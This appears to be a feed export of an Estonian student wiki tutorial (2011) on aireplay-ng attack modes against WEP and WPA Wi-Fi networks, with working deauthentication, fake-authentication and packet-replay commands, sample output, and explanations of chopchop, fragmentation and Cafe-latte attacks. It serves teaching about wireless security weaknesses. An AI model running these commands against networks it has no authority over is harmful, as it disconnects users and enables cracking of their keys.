See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32789</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32789"/>
		<updated>2011-05-24T18:45:45Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Shared Key Authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
